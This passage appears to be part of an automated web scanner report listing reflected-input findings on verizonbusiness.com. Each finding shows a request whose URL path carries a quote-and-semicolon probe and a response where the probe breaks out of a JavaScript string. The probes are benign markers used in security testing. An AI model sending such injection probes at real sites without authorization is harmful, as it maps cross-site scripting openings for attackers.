Connection: close
Expires: Mon, 16 Nov 2009 18:41:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/prof-svcs5d8ce';c6452b4e25e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.313. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b698'%3be644f6c6049 was submitted in the REST URL parameter 1. This input was echoed as 9b698';e644f6c6049 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products9b698'%3be644f6c6049/security/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:42:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products9b698';e644f6c6049/security/risk/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.314. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca1e2"%3b895eeb0feb6 was submitted in the REST URL parameter 1. This input was echoed as ca1e2";895eeb0feb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsca1e2"%3b895eeb0feb6/security/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsca1e2";895eeb0feb6/security/risk/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.315. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fc7d'%3b7472ba30d19 was submitted in the REST URL parameter 2. This input was echoed as 8fc7d';7472ba30d19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security8fc7d'%3b7472ba30d19/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42309
Date: Wed, 17 Nov 2010 00:44:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security8fc7d';7472ba30d19/risk/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.316. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 638eb"%3b3e97688d0a was submitted in the REST URL parameter 2. This input was echoed as 638eb";3e97688d0a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security638eb"%3b3e97688d0a/risk/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42307
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security638eb";3e97688d0a/risk/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.317. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f17'%3bb99e5a99ddf was submitted in the REST URL parameter 3. This input was echoed as 33f17';b99e5a99ddf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/risk33f17'%3bb99e5a99ddf/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43488
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/risk33f17';b99e5a99ddf/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.318. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/risk/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee991"%3b3c03f9138ac was submitted in the REST URL parameter 3. This input was echoed as ee991";3c03f9138ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/riskee991"%3b3c03f9138ac/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43486
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/riskee991";3c03f9138ac/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.319. http://www.verizonbusiness.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6009"%3b177eb6f1c36 was submitted in the REST URL parameter 1. This input was echoed as f6009";177eb6f1c36 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutf6009"%3b177eb6f1c36/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40612
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutf6009";177eb6f1c36/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.320. http://www.verizonbusiness.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d96e'%3ba6921a723ab was submitted in the REST URL parameter 1. This input was echoed as 2d96e';a6921a723ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about2d96e'%3ba6921a723ab/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40612
Date: Wed, 17 Nov 2010 00:47:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about2d96e';a6921a723ab/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.321. http://www.verizonbusiness.com/about/company/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74ca5"%3bb75f8746d3e was submitted in the REST URL parameter 1. This input was echoed as 74ca5";b75f8746d3e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about74ca5"%3bb75f8746d3e/company/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:42 GMT
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about74ca5";b75f8746d3e/company/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.322. http://www.verizonbusiness.com/about/company/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cd00'%3bbd1e2bc7aa was submitted in the REST URL parameter 1. This input was echoed as 1cd00';bd1e2bc7aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about1cd00'%3bbd1e2bc7aa/company/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:52:50 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40624
Date: Wed, 17 Nov 2010 00:52:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about1cd00';bd1e2bc7aa/company/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.323. http://www.verizonbusiness.com/about/company/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60103"%3b4e0dd501f85 was submitted in the REST URL parameter 2. This input was echoed as 60103";4e0dd501f85 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/company60103"%3b4e0dd501f85/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:52:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47087
Date: Wed, 17 Nov 2010 00:52:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/company60103";4e0dd501f85/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.324. http://www.verizonbusiness.com/about/company/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a39dc'%3b3e6cb8d10dd was submitted in the REST URL parameter 2. This input was echoed as a39dc';3e6cb8d10dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/companya39dc'%3b3e6cb8d10dd/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:05 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47089
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/companya39dc';3e6cb8d10dd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.325. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/company/executives/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecd29"%3bb46d3377feb was submitted in the REST URL parameter 1. This input was echoed as ecd29";b46d3377feb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutecd29"%3bb46d3377feb/company/executives/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:52 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
